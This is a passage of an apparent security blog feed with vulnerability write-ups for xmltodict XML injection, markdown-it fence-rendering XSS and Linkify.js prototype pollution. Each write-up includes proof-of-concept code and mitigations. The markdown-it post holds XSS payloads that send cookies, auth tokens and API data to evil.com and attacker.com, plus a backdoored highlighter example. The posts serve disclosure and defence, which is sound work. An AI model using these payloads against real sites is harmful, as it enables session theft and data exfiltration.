    &quot;legitimate_field&quot;: &quot;normal_data&quot;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This could manipulate e-commerce XML data by injecting false pricing information.&lt;/p&gt;
&lt;h3&gt;Web Application Context&lt;/h3&gt;
&lt;p&gt;In web applications that render XML output in browsers:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Payload:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;xss_payload = {&quot;item&amp;gt;&amp;lt;script&amp;gt;alert(&apos;XSS&apos;)&amp;lt;/script&amp;gt;&amp;lt;item&quot;: &quot;data&quot;}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When this XML is rendered in a web context without proper escaping, it results in JavaScript execution.&lt;/p&gt;
&lt;h2&gt;Proof of Concept&lt;/h2&gt;
&lt;p&gt;Here&apos;s a complete demonstration:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/env python3
import xmltodict

def demonstrate_xml_injection():
    &quot;&quot;&quot;Demonstrates the XML injection vulnerability&quot;&quot;&quot;

    print(&quot;=== CVE-2025-9375 XML Injection PoC ===\n&quot;)

    # Test Case 1: Basic structure breaking
    print(&quot;1. Basic XML structure manipulation:&quot;)
    payload1 = {&quot;item&amp;gt;&amp;lt;injected&amp;gt;MALICIOUS CONTENT&amp;lt;/injected&amp;gt;&amp;lt;dummy&quot;: &quot;value&quot;}
    result1 = xmltodict.unparse(payload1, full_document=False)
    print(f&quot;Input: {payload1}&quot;)
    print(f&quot;Output: {result1}&quot;)
    print()

    # Test Case 2: Attribute injection
    print(&quot;2. Attribute injection:&quot;)
    payload2 = {&quot;item attribute=&apos;malicious&apos;&quot;: &quot;value&quot;}
    result2 = xmltodict.unparse(payload2, full_document=False)
    print(f&quot;Input: {payload2}&quot;)
    print(f&quot;Output: {result2}&quot;)
    print()

    # Test Case 3: CDATA breaking
    print(&quot;3. CDATA section injection:&quot;)
    payload3 = {&quot;item&amp;gt;&amp;lt;![CDATA[]]&amp;gt;&amp;lt;script&amp;gt;alert(&apos;XSS&apos;)&amp;lt;/script&amp;gt;&amp;lt;dummy&quot;: &quot;value&quot;}
    result3 = xmltodict.unparse(payload3, full_document=False)
    print(f&quot;Input: {payload3}&quot;)
    print(f&quot;Output: {result3}&quot;)
    print()

if __name__ == &quot;__main__&quot;:
    demonstrate_xml_injection()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;strong&gt;Expected Output:&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;=== CVE-2025-9375 XML Injection PoC ===

1. Basic XML structure manipulation:
Input: {&apos;item&amp;gt;&amp;lt;injected&amp;gt;MALICIOUS CONTENT&amp;lt;/injected&amp;gt;&amp;lt;dummy&apos;: &apos;value&apos;}
Output: &amp;lt;item&amp;gt;&amp;lt;injected&amp;gt;MALICIOUS CONTENT&amp;lt;/injected&amp;gt;&amp;lt;dummy&amp;gt;value&amp;lt;/item&amp;gt;&amp;lt;injected&amp;gt;MALICIOUS CONTENT&amp;lt;/injected&amp;gt;&amp;lt;dummy&amp;gt;

2. Attribute injection:
Input: {&quot;item attribute=&apos;malicious&apos;&quot;: &apos;value&apos;}
Output: &amp;lt;item attribute=&apos;malicious&apos;&amp;gt;value&amp;lt;/item attribute=&apos;malicious&apos;&amp;gt;

3. CDATA section injection:
Input: {&quot;item&amp;gt;&amp;lt;![CDATA[]]&amp;gt;&amp;lt;script&amp;gt;alert(&apos;XSS&apos;)&amp;lt;/script&amp;gt;&amp;lt;dummy&quot;: &apos;value&apos;}
Output: &amp;lt;item&amp;gt;&amp;lt;![CDATA[]]&amp;gt;&amp;lt;script&amp;gt;alert(&apos;XSS&apos;)&amp;lt;/script&amp;gt;&amp;lt;dummy&amp;gt;value&amp;lt;/item&amp;gt;&amp;lt;![CDATA[]]&amp;gt;&amp;lt;script&amp;gt;alert(&apos;XSS&apos;)&amp;lt;/script&amp;gt;&amp;lt;dummy&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Impact Assessment&lt;/h2&gt;
&lt;h3&gt;Real-World Impact Scenarios&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;API Data Corruption&lt;/strong&gt;: REST APIs using xmltodict for XML responses could have their data structure corrupted&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Configuration File Manipulation&lt;/strong&gt;: Applications that generate XML config files could be compromised&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Web Application XSS&lt;/strong&gt;: When XML output is rendered in browsers, XSS attacks become possible&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Processing Pipelines&lt;/strong&gt;: ETL processes could inject malicious data into downstream systems&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Document Generation&lt;/strong&gt;: PDF or report generators using XML templates could be manipulated&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Affected Systems&lt;/h3&gt;
&lt;p&gt;Any application using &lt;code&gt;xmltodict.unparse()&lt;/code&gt; with user-controlled dictionary keys is vulnerable:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Web APIs converting JSON to XML&lt;/li&gt;
&lt;li&gt;Configuration management systems&lt;/li&gt;
&lt;li&gt;Data transformation pipelines&lt;/li&gt;
&lt;li&gt;Document generation services&lt;/li&gt;
&lt;li&gt;Integration platforms&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Mitigation Strategies&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Input Validation&lt;/strong&gt;: Validate dictionary keys before passing to &lt;code&gt;unparse()&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;import re
def safe_xml_key(key):
    # Only allow valid XML name characters
    return re.match(r&apos;^[a-zA-Z_][a-zA-Z0-9_.-]*$&apos;, key) is not None
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;2&quot;&gt;
&lt;li&gt;&lt;strong&gt;Key Sanitization&lt;/strong&gt;: Sanitize keys to remove dangerous characters&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;import re

def sanitize_dict_keys(data):
    if isinstance(data, dict):
        sanitized = {}
        for key, value in data.items():
            # Replace characters that are invalid in XML names
            safe_key = re.sub(r&apos;[^a-zA-Z0-9_.-]&apos;, &apos;_&apos;, str(key))
            # XML names cannot start with a digit, hyphen, or period
            if not re.match(r&apos;[a-zA-Z_]&apos;, safe_key):
                safe_key = &apos;_&apos; + safe_key
            sanitized[safe_key] = sanitize_dict_keys(value)
        return sanitized
    if isinstance(data, list):
        # Recurse into lists so nested dicts are sanitized too
        return [sanitize_dict_keys(item) for item in data]
    return data
&lt;/code&gt;&lt;/pre&gt;
&lt;ol start=&quot;3&quot;&gt;
&lt;li&gt;&lt;strong&gt;Alternative Libraries&lt;/strong&gt;: Consider building XML with libraries that validate element names, for example &lt;code&gt;lxml&lt;/code&gt;, which raises a &lt;code&gt;ValueError&lt;/code&gt; for invalid tag names instead of emitting broken markup.&lt;/li&gt;
&lt;/ol&gt;
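&lt;p&gt;A related defensive pattern, sketched with the standard library&apos;s &lt;code&gt;xml.etree.ElementTree&lt;/code&gt;: treat untrusted keys as &lt;em&gt;data&lt;/em&gt; (attribute values, which the serializer escapes) rather than as &lt;em&gt;structure&lt;/em&gt; (tag names, which it does not validate). The &lt;code&gt;entry&lt;/code&gt;/&lt;code&gt;name&lt;/code&gt; element shape here is illustrative:&lt;/p&gt;

```python
import xml.etree.ElementTree as ET

def dict_to_safe_xml(data, root_tag="root"):
    """Serialize a flat dict without ever using untrusted keys as tag names."""
    root = ET.Element(root_tag)
    for key, value in data.items():
        # The key lands in an attribute value, where the serializer
        # escapes quotes and markup characters automatically.
        entry = ET.SubElement(root, "entry", name=str(key))
        entry.text = str(value)
    return ET.tostring(root, encoding="unicode")

print(dict_to_safe_xml({"item injected='1'": "value"}))
```

&lt;p&gt;The same hostile key that corrupts &lt;code&gt;unparse()&lt;/code&gt; output is rendered harmless here because it never becomes part of the markup itself.&lt;/p&gt;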
&lt;hr /&gt;
&lt;p&gt;&lt;strong&gt;References:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/martinblech/xmltodict&quot;&gt;xmltodict GitHub Repository&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/07-Testing_for_XML_Injection&quot;&gt;OWASP XML Injection Guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://fluidattacks.com/advisories/mono&quot;&gt;Security Advisory&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2025-9375&quot;&gt;CVE-2025-9375 Details&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</content:encoded></item><item><title>CVE-2025-7969: Markdown-it Fence Rendering XSS - Fito</title><link>http://caverav.cl/posts/markdown-it-xss/markdown-it-xss/</link><guid isPermaLink="true">http://caverav.cl/posts/markdown-it-xss/markdown-it-xss/</guid><pubDate>Wed, 20 Aug 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;TL;DR&lt;/h2&gt;
&lt;p&gt;Markdown-it &lt;code&gt;14.1.0&lt;/code&gt; contains an XSS vulnerability (CVE-2025-7969) that enables arbitrary JavaScript execution through a fence rendering bypass. This post provides a technical deep dive into the vulnerability, exploitation techniques, and real-world impact scenarios.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Technical Analysis&lt;/h2&gt;
&lt;h3&gt;The Core Vulnerability&lt;/h3&gt;
&lt;p&gt;The vulnerability exists in the library&apos;s fence rendering logic. Markdown-it uses a naive string check in its &lt;code&gt;default_rules.fence&lt;/code&gt; function that bypasses all security controls when highlight functions return HTML starting with &lt;code&gt;&amp;lt;pre&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// lib/renderer.mjs lines 48-50
if (highlighted.indexOf(&apos;&amp;lt;pre&apos;) === 0) {
    return highlighted + &apos;\n&apos;  // Direct return bypasses all sanitization
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Fence Rendering Mechanics&lt;/h3&gt;
&lt;p&gt;When processing fenced code blocks, the library accepts user-controlled content through custom highlight functions. The vulnerability occurs when:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A custom &lt;code&gt;options.highlight&lt;/code&gt; function processes user input&lt;/li&gt;
&lt;li&gt;The function returns content that starts with the string &lt;code&gt;&amp;lt;pre&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Markdown-it bypasses &lt;strong&gt;all&lt;/strong&gt; HTML escaping and sanitization&lt;/li&gt;
&lt;li&gt;Malicious content is injected directly into the DOM&lt;/li&gt;
&lt;/ol&gt;
&lt;pre&gt;&lt;code&gt;// Vulnerable fence processing flow
default_rules.fence = function (tokens, idx, options, env, slf) {
  const token = tokens[idx]
  // ... language processing ...
  
  let highlighted
  if (options.highlight) {
    // User-controlled content processed here
    highlighted = options.highlight(token.content, langName, langAttrs) || escapeHtml(token.content)
  } else {
    highlighted = escapeHtml(token.content)  // Safe path
  }

  // THE VULNERABILITY: No validation of highlight function output
  if (highlighted.indexOf(&apos;&amp;lt;pre&apos;) === 0) {
    return highlighted + &apos;\n&apos;  // Direct injection!
  }
  
  // Normal safe rendering path
  return `&amp;lt;pre&amp;gt;&amp;lt;code${slf.renderAttrs(token)}&amp;gt;${highlighted}&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;\n`
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;The XSS Injection Chain&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Input Phase&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;User provides fenced code block with malicious content&lt;/li&gt;
&lt;li&gt;Content is designed to trick highlight functions into returning &lt;code&gt;&amp;lt;pre&lt;/code&gt;-prefixed HTML&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Processing Phase&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Custom highlight function processes the malicious input&lt;/li&gt;
&lt;li&gt;Function returns HTML containing both legitimate &lt;code&gt;&amp;lt;pre&amp;gt;&lt;/code&gt; tags and malicious payloads&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Bypass Phase&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Markdown-it&apos;s string check &lt;code&gt;highlighted.indexOf(&apos;&amp;lt;pre&apos;) === 0&lt;/code&gt; passes&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;All sanitization is bypassed&lt;/strong&gt; - content returned directly&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Injection Phase&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Malicious HTML/JavaScript executes in browser context&lt;/li&gt;
&lt;li&gt;No Content Security Policy or input validation can stop it at this point&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Advanced Exploitation Vectors&lt;/h3&gt;
&lt;h4&gt;Direct Code Block Injection&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;const maliciousMarkdown = `
\`\`\`javascript
&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;console.log(&quot;Normal code&quot;);&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;img src=&quot;x&quot; onerror=&quot;alert(&apos;XSS!&apos;)&quot;&amp;gt;
\`\`\`
`;

// Highlight function that enables the vulnerability
const vulnerableHighlight = (str, lang, attrs) =&amp;gt; {
    if (str.trim().startsWith(&apos;&amp;lt;pre&apos;)) {
        return str;  // Direct return enables bypass
    }
    return `&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;${str}&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;`;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;Event Handler Injection&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;const eventHandlerPayload = `
\`\`\`html
&amp;lt;pre onclick=&quot;fetch(&apos;/api/user&apos;, {credentials:&apos;include&apos;}).then(r=&amp;gt;r.json()).then(d=&amp;gt;fetch(&apos;//evil.com/&apos;+btoa(JSON.stringify(d))))&quot; style=&quot;cursor:pointer;background:#f00;color:white;padding:10px;&quot;&amp;gt;
Click for data exfiltration
&amp;lt;/pre&amp;gt;
\`\`\`
`;
&lt;/code&gt;&lt;/pre&gt;
&lt;h4&gt;DOM-Based XSS Chain&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;// Multi-stage attack through DOM manipulation
const domChainPayload = `
\`\`\`javascript
&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;function legitimate() { return true; }&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;
&amp;lt;script&amp;gt;
// Stage 1: Setup persistence
localStorage.setItem(&apos;xss_payload&apos;, &apos;document.body.innerHTML=&quot;&amp;lt;h1&amp;gt;PWNED&amp;lt;/h1&amp;gt;&quot;&apos;);

// Stage 2: Trigger on user interaction
document.addEventListener(&apos;click&apos;, () =&amp;gt; {
    eval(localStorage.getItem(&apos;xss_payload&apos;));
});
&amp;lt;/script&amp;gt;
\`\`\`
`;
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Bypassing Traditional Protections&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Content Security Policy (CSP)&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Many CSP implementations allow inline event handlers&lt;/li&gt;
&lt;li&gt;The vulnerability occurs during markdown processing, before CSP evaluation&lt;/li&gt;
&lt;li&gt;Malicious content appears as &quot;legitimate&quot; markdown output&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Input Sanitization&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Traditional HTML sanitizers run &lt;strong&gt;after&lt;/strong&gt; markdown processing&lt;/li&gt;
&lt;li&gt;The vulnerability bypasses markdown-it&apos;s internal sanitization&lt;/li&gt;
&lt;li&gt;Malicious content looks like valid HTML structure&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Server-Side Rendering&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;XSS executes during client-side hydration&lt;/li&gt;
&lt;li&gt;Server logs show &quot;legitimate&quot; markdown processing&lt;/li&gt;
&lt;li&gt;Difficult to detect through traditional monitoring&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Exploitation Techniques&lt;/h2&gt;
&lt;h3&gt;Stored XSS via Documentation Systems&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;// Vulnerable documentation platform
app.post(&apos;/docs/create&apos;, (req, res) =&amp;gt; {
    const { content, title } = req.body;
    
    // Process markdown with vulnerable highlight function
    const html = md.render(content);
    
    // Store in database - becomes persistent XSS
    database.docs.insert({
        title,
        content: html,  // Stored XSS payload
        created: new Date()
    });
});
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Reflected XSS via Live Previews&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;// Live markdown preview endpoint (vulnerable)
app.get(&apos;/preview&apos;, (req, res) =&amp;gt; {
    const markdown = req.query.content;
    
    // Real-time processing enables reflected XSS
    const preview = md.render(markdown);
    
    res.json({ preview });  // XSS in response
});
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Supply Chain Attacks&lt;/h3&gt;
&lt;pre&gt;&lt;code&gt;// Malicious highlight function in compromised package
const compromisedHighlighter = (code, lang) =&amp;gt; {
    // Legitimate highlighting
    const result = actualHighlight(code, lang);
    
    // Inject backdoor when specific conditions met
    if (code.includes(&apos;SECRET_TRIGGER&apos;)) {
        return `&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;${result}&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;img src=&quot;x&quot; onerror=&quot;fetch(&apos;//attacker.com/harvest?data=&apos;+document.cookie)&quot;&amp;gt;`;
    }
    
    return result;
};
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Advanced Payload Construction&lt;/h3&gt;
&lt;h4&gt;Multi-Vector Attack&lt;/h4&gt;
&lt;pre&gt;&lt;code&gt;const multiVectorPayload = `
\`\`\`html
&amp;lt;pre id=&quot;legit&quot;&amp;gt;&amp;lt;code&amp;gt;function example() { return 42; }&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;
&amp;lt;style&amp;gt;
#legit { display: none; }
body::after { 
  content: &quot;Loading...&quot;; 
  position: fixed; 
  top: 50%; 
  left: 50%; 
  transform: translate(-50%, -50%);
  font-size: 24px;
}
&amp;lt;/style&amp;gt;
&amp;lt;script&amp;gt;
// Delayed execution to avoid detection
setTimeout(() =&amp;gt; {
  // Credential harvesting
  const token = localStorage.getItem(&apos;auth_token&apos;);
  const session = document.cookie;
  
  // Data exfiltration
  fetch(&apos;//evil.com/collect&apos;, {
    method: &apos;POST&apos;,
    body: JSON.stringify({ token, session, url: location.href }),
    headers: { &apos;Content-Type&apos;: &apos;application/json&apos; }
  });
  
  // Cover tracks
  document.querySelector(&apos;style&apos;).remove();
  document.getElementById(&apos;legit&apos;).style.display = &apos;block&apos;;
}, 2000);
&amp;lt;/script&amp;gt;
\`\`\`
`;
&lt;/code&gt;&lt;/pre&gt;
&lt;h2&gt;Mitigation Strategies&lt;/h2&gt;
&lt;h3&gt;Immediate Actions&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Upgrade markdown-it&lt;/strong&gt; as soon as a patched version becomes available (none existed at the time of writing)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;npm install markdown-it@latest
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Temporary Workarounds&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Safe highlight function wrapper
function safeHighlight(originalHighlight) {
  return function(str, lang, attrs) {
    const result = originalHighlight(str, lang, attrs);
    
    // Never return content starting with &amp;lt;pre
    if (typeof result === &apos;string&apos; &amp;amp;&amp;amp; result.indexOf(&apos;&amp;lt;pre&apos;) === 0) {
      // Force safe rendering path
      return null;
    }
    
    return result;
  };
}

// Usage
const md = new MarkdownIt({
  highlight: safeHighlight(myHighlightFunction)
});
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Secure Implementation Patterns&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Output Validation&lt;/strong&gt; (simple validations to make a point)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function validateHighlightOutput(output, originalContent) {
  // Reject any output that begins with an HTML tag; note that a regex
  // scan of only the first few characters is bypassed by longer opening tags
  if (output.trim().startsWith(&apos;&amp;lt;&apos;)) {
    throw new Error(&apos;Highlight function returned unsafe HTML&apos;);
  }
  
  // Ensure output doesn&apos;t contain script tags or event handlers
  const dangerousPatterns = [
    /&amp;lt;script\b[^&amp;lt;]*(?:(?!&amp;lt;\/script&amp;gt;)&amp;lt;[^&amp;lt;]*)*&amp;lt;\/script&amp;gt;/gi,
    /\bon\w+\s*=/gi,
    /javascript:/gi,
    /data:text\/html/gi
  ];
  
  for (const pattern of dangerousPatterns) {
    if (pattern.test(output)) {
      throw new Error(&apos;Highlight function returned malicious content&apos;);
    }
  }
  
  return output;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Content Security Policy&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// Strict CSP for markdown content
app.use((req, res, next) =&amp;gt; {
  res.setHeader(&apos;Content-Security-Policy&apos;, [
    &quot;default-src &apos;self&apos;&quot;,
    &quot;script-src &apos;self&apos; &apos;unsafe-inline&apos;&quot;,  // Only if absolutely necessary
    &quot;object-src &apos;none&apos;&quot;,
    &quot;style-src &apos;self&apos; &apos;unsafe-inline&apos;&quot;,   // For syntax highlighting
    &quot;img-src &apos;self&apos; data: https:&quot;,
    &quot;connect-src &apos;self&apos;&quot;
  ].join(&apos;; &apos;));
  next();
});
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;HTML Sanitization&lt;/strong&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import DOMPurify from &apos;dompurify&apos;;

// Always sanitize markdown output
function renderSafeMarkdown(content, options) {
  const html = md.render(content, options);
  
  // Sanitize the final HTML output
  return DOMPurify.sanitize(html, {
    ALLOWED_TAGS: [&apos;p&apos;, &apos;br&apos;, &apos;strong&apos;, &apos;em&apos;, &apos;code&apos;, &apos;pre&apos;, &apos;h1&apos;, &apos;h2&apos;, &apos;h3&apos;],
    ALLOWED_ATTR: [&apos;class&apos;],
    FORBID_SCRIPT: true,
    FORBID_TAGS: [&apos;script&apos;, &apos;object&apos;, &apos;embed&apos;, &apos;link&apos;],
    FORBID_ATTR: [&apos;onerror&apos;, &apos;onclick&apos;, &apos;onload&apos;, &apos;onmouseover&apos;]
  });
}
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;This vulnerability demonstrates the critical importance of output validation in markdown processing libraries. The bypass mechanism in markdown-it&apos;s fence rendering creates a significant attack surface that affects any application using custom highlight functions.&lt;/p&gt;
&lt;p&gt;The impact is particularly severe given markdown-it&apos;s widespread adoption in documentation platforms, content management systems, and developer tools. Organizations should prioritize upgrading to patched versions (hopefully available soon) and implementing additional security layers.&lt;/p&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a href=&quot;https://github.com/markdown-it/markdown-it&quot;&gt;Markdown-it GitHub Repository&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://developer.mozilla.org/en-US/docs/Glossary/Cross-site_scripting&quot;&gt;MDN: Cross-site scripting (XSS)&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html&quot;&gt;OWASP XSS Prevention Cheat Sheet&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2025-7969&quot;&gt;CVE-2025-7969 Details&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://fluidattacks.com/advisories/fito&quot;&gt;Security Advisory&lt;/a&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h2&gt;Exploit PoC&lt;/h2&gt;
&lt;pre&gt;&lt;code&gt;import MarkdownIt from &apos;markdown-it&apos;;

// Vulnerable highlight function
const highlight = (str, lang) =&amp;gt; {
  if (str.trim().startsWith(&apos;&amp;lt;pre&apos;)) {
    return str;  // This enables the bypass
  }
  return `&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;${str}&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;`;
};

const md = new MarkdownIt({ highlight });

const payload = `
\`\`\`javascript
&amp;lt;pre&amp;gt;&amp;lt;code&amp;gt;console.log(&quot;Hello&quot;);&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;img src=&quot;x&quot; onerror=&quot;alert(&apos;XSS!&apos;)&quot;&amp;gt;
\`\`\`
`;

console.log(md.render(payload));
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Result: the XSS payload executes when the generated HTML is rendered in a browser.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Stored/Reflected/DOM-based XSS&lt;/strong&gt; in any application using vulnerable markdown-it&lt;/li&gt;
&lt;li&gt;Affects documentation platforms, CMSs, and developer tools&lt;/li&gt;
&lt;li&gt;CVE reserved: &lt;strong&gt;CVE-2025-7969&lt;/strong&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr /&gt;
</content:encoded></item><item><title>CVE-2025-8101: Linkify.js Prototype Pollution &amp; XSS - Charly</title><link>http://caverav.cl/posts/linkify-xss/linkify-xss/</link><guid isPermaLink="true">http://caverav.cl/posts/linkify-xss/linkify-xss/</guid><pubDate>Sat, 26 Jul 2025 00:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;TL;DR&lt;/h2&gt;
&lt;p&gt;Linkify.js &lt;code&gt;4.3.1&lt;/code&gt; contains a prototype pollution vulnerability (CVE-2025-8101) that enables arbitrary JavaScript execution through DOM-based XSS. This post provides a technical deep dive into the vulnerability, exploitation techniques, and real-world impact scenarios.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2&gt;Technical Analysis&lt;/h2&gt;
&lt;h3&gt;The Core Vulnerability&lt;/h3&gt;
&lt;p&gt;At its core, the vulnerability exists in the library&apos;s attribute assignment logic. Linkify.js uses a custom &lt;code&gt;assign()&lt;/code&gt; helper function that naively copies properties without proper validation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;export default function assign(target, properties) {
  for (const key in properties) {
    target[key] = properties[key];  // Prototype pollution vector
  }
  return target;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;Prototype Pollution Mechanics&lt;/h3&gt;
&lt;p&gt;When processing link attributes, the library accepts user-controlled input through the &lt;code&gt;options.attributes&lt;/code&gt; object. By providing a specially crafted object with a &lt;code&gt;__proto__&lt;/code&gt; property, an attacker can pollute the prototype of the base &lt;code&gt;Object&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const maliciousOptions = {
  attributes: {
    __proto__: { 
      // These properties will be inherited by all objects
      onclick: &apos;alert(&quot;XSS&quot;)&apos;,
      onmouseover: &apos;alert(&quot;XSS&quot;)&apos;,
      // ... other malicious attributes
    }
  }
};
&lt;/code&gt;&lt;/pre&gt;
&lt;h3&gt;The DOM XSS Chain&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Initialization Phase&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Application initializes Linkify with user-controlled options&lt;/li&gt;
&lt;li&gt;Malicious attributes are merged into the prototype chain&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;DOM Injection&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;When links are rendered, they inherit the polluted prototype&lt;/li&gt;
&lt;li&gt;Inherited attributes, including event handlers, are copied onto each generated link&lt;/li&gt;
&lt;li&gt;No direct assignment of malicious code is visible in the DOM&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
